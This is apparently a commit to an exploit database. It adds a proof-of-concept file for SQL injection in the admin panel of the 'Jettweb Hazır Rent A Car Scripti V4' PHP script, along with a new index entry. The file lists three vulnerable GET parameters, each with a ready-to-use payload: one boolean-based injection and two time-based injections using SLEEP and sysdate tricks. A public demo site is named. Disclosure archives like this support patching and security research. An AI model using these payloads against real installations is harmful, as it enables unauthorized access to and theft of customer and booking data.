DB: 2019-03-28

1 changes to exploits/shellcodes Jettweb Hazır Rent A Car Scripti V4 - SQL Injection
2019-03-28 05:02:18 +00:00 · 2019-03-28 05:02:18 +00:00 · 4333ceb122
commit 4333ceb122
parent 5d4c907a8e
2 changed files with 30 additions and 0 deletions
--- a/exploits/php/webapps/46614.txt
+++ b/exploits/php/webapps/46614.txt
@ -0,0 +1,29 @@
+# Exploit Title: Jettweb Hazır Rent A Car Scripti V4 - SQL Injection
+# Date: 26.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://jettweb.net/u-46-php-hazir-rent-a-car-scripti-v4.html
+# Demo Site: http://rentv4.proemlaksitesi.net/
+# Version: V4
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/admin/index.php?admin=vitestipi&tur=VitesTipi
+Vulnerable Parameter: tur (GET)
+Payload: admin=vitestipi&tur=VitesTipi' AND 2211=2211 AND 'fVeE'='fVeE
+
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/admin/index.php?admin=rez-gor&id=2
+Vulnerable Parameter: id (GET)
+Payload: admin=rez-gor&id=2 AND SLEEP(5)
+
+----- PoC 3: SQLi -----
+
+Request: http://localhost/[PATH]/admin/index.php
+Vulnerable Parameter: ozellikdil (GET)
+Payload:
+admin=ozellikekle&itemid=1&ozellikdil=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&syf=ceviriguncelle&tur=VitesTipi
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -41055,3 +41055,4 @@ id,file,description,date,author,type,platform,port
 46610,exploits/php/webapps/46610.txt,"XooDigital - 'p' SQL Injection",2019-03-26,"Ahmet Ümit BAYRAM",webapps,php,80
 46611,exploits/windows/webapps/46611.txt,"Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion",2019-03-26,"Kevin Randall",webapps,windows,
 46612,exploits/php/webapps/46612.txt,"SJS Simple Job Script - SQL Injection / Cross-Site Scripting",2019-03-26,"Ahmet Ümit BAYRAM",webapps,php,80
+46614,exploits/php/webapps/46614.txt,"Jettweb Hazır Rent A Car Scripti V4 - SQL Injection",2019-03-27,"Ahmet Ümit BAYRAM",webapps,php,80